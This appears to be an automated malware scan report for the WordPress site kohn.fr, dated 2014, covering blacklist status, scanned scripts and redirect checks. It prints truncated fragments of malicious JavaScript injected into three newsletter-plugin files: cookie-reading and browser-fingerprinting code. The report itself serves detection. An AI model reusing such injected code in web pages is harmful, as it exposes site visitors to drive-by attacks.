Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kohn.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kohn.fr/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kohn.fr/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 07 Oct 2014 02:09:26 GMT Location: http://www.kohn.fr/ Server: Apache/2.4.7 (Ubuntu) Content-Type: text/html; charset=UTF-8 Set-Cookie: _icl_current_language=fr; expires=Wed, 08-Oct-2014 02:09:27 GMT; path=/ X-Hyper-Cache: continue - no file X-Pingback: http://www.kohn.fr/xmlrpc.php X-Powered-By: PHP/5.2.9-1.illimite | clean |
http://www.kohn.fr/ | 200 OK Content-Length: 17985 Content-Type: text/html | clean |
http://www.kohn.fr/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/themes/striking_r/js/jquery.fancybox.min.js?ver=2.1.5 | 200 OK Content-Length: 27082 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/themes/striking_r/js/custom.combine.js?ver=4.0 | 200 OK Content-Length: 58941 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/themes/striking_r/js/jquery-sticker.min.js?ver=0.6.5 | 200 OK Content-Length: 7374 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/themes/striking_r/js/jquery.stickyfooter.min.js?ver=1.0 | 200 OK Content-Length: 425 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=4.0 | 200 OK Content-Length: 1064 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-fr.js?ver=2.6.11 | 200 OK Content-Length: 8868 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - "alertText": "* Ce nom est déjà pris", "alertTextOk": "*Ce nom est disponible", "alertTextLoad": "* Chargement, veuillez attendre" }, "validate2fields": { "alertText": "Veuillez taper le mot HELLO" } }; } }; $.validationEngineLanguage.newLang(); })(jQuery); Antivirus reports:
| ||
http://www.kohn.fr/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.6.11 | 200 OK Content-Length: 70841 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - fadeDuration: 0.3, // Use Prettify select library prettySelect: false, // Add css class on prompt addPromptClass : "", // Custom ID uses prefix usePrefix: "", // Custom ID uses suffix useSuffix: "", // Only show one message per error prompt showOneMessage: false }}; $(function(){$.validationEngine.defaults.promptPosition = methods.isRTL()?'topLeft':"topRight"}); })(jQuery); Antivirus reports:
| ||
http://www.kohn.fr/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.6.11 | 200 OK Content-Length: 4320 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://kohn.fr/test404page.js | 404 Not Found Content-Length: 12291 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kohn.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 07 Oct 2014 02:09:26 GMT
Location: http://www.kohn.fr/
Server: Apache/2.4.7 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=fr; expires=Wed, 08-Oct-2014 02:09:27 GMT; path=/
X-Hyper-Cache: continue - no file
X-Pingback: http://www.kohn.fr/xmlrpc.php
X-Powered-By: PHP/5.2.9-1.illimite
GET / HTTP/1.1
Host: kohn.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 07 Oct 2014 02:09:26 GMT
Location: http://www.kohn.fr/
Server: Apache/2.4.7 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=fr; expires=Wed, 08-Oct-2014 02:09:27 GMT; path=/
X-Hyper-Cache: continue - no file
X-Pingback: http://www.kohn.fr/xmlrpc.php
X-Powered-By: PHP/5.2.9-1.illimite
Second query (visit from search engine):
GET / HTTP/1.1
Host: kohn.fr
Referer: http://www.google.com/search?q=kohn.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kohn.fr
Referer: http://www.google.com/search?q=kohn.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.